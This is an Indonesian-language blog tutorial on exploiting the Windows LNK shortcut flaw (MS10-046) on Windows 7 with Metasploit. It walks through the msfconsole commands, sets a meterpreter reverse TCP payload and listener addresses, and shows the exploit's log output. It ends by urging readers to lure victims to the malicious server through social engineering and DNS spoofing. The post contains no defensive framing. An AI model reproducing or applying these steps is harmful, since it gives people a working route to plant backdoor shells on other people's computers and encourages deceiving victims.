Exploit ms10_046_shortcut_icon_dllloader win7 attack

exploit ini masih work di windows7 .. walaupun memang dibutuhkan tehnik2 social engineering untuk membawa target membuka malicious url yang sudah anda siapkan sebelumnya … oke untuk tutorial kali ini kembali lagi ane menggunakan dracos2 x64 .. mungkin yang mau nyoba-nyoba dracos bisa kesini
http://backtrack.org
Pertama-tama buka console msf kita .. ( bypass lewat msfcli juga bisa kok :) )
root@dracos:~# msfconsole
Setelah terbuka seperti ini

Image
lanjutkan dengan menggunakan fasilitas search
msf > search LNK
Matching Modules
================
   Name                                                      Disclosure Date  Rank       Description
   ----                                                      ---------------  ----       -----------
   exploit/windows/browser/ms10_046_shortcut_icon_dllloader  2010-07-16       excellent  Microsoft Windows Shell LNK Code Execution
   post/windows/escalate/droplnk                                              normal     Windows Escalate SMB Icon LNK Dropper
   post/windows/gather/dumplinks                                              normal     Windows Gather Dump Recent Files lnk Info
Tuh sudah kelihatan exploit yang kita cari .. gunakan exploit tersebut
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Terus biar kita jadi mode listener kita gunakan payload windows meterpreter reverse TCP
msf  exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
Cek opsi2 yang kita perlu dalam menjalankan exploit ini :D
msf  exploit(ms10_046_shortcut_icon_dllloader) > show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  80               yes       The daemon port to listen on (do not change)
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH  /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Automatic
Ok kita butuh alamat server ( srvhost ) dimana nantinya metasploit akan memulai malicious url dengan port 80 ( default ) dan path / uripath ( / )
msf  exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.2.7
 SRVHOST => 192.168.2.7
Kebetulan sih ip yang ane pake pada percobaan ini adalah
root@dracos:~# ifconfig wlan0 |grep inet
 inet addr:192.168.2.7  Bcast:192.168.2.255  Mask:255.255.255.0
 inet6 addr: fe80::f6ec:38ff:fe99:60f3/64 Scope:Link
Terus sebagai persyaratan payload reverse TCP kita wajib memberikan informasi local host kita ( LHOST )
msf  exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.2.7
 LHOST => 192.168.2.7
Jalankan exploit dengan perintah exploit .. gk usah di tambahkan -j untuk opsi background process karena exploit ini sudah dengan sendirinya berjalan di sana
 msf  exploit(ms10_046_shortcut_icon_dllloader) > [*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Sending UNC redirect
 [*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
 [*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
 [*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /bnVuSf
 [*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Sending 301 for /bnVuSf ...
 [*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND
sniff..
hmm ketika target membuka url malicious kita maka dengan sendiri nya server malicious akan mengirimkan backdoor .. dan meterpreter pun terbuka untuk attacker
Image
Notes : gunakan tehnik2 social engineering, dns spoof dan masih banyak lagi untuk menggiring korban anda dalam mengakses server malicious anda .. :)
akhir kata saya ucapkan selamat makan :D

Comments

Popular posts from this blog

perbedaan program aplikasi dengan sistem oprasi

Free Download 16 Template Hacker Blog

11 distro untuk kebutuhan pentester ato hacking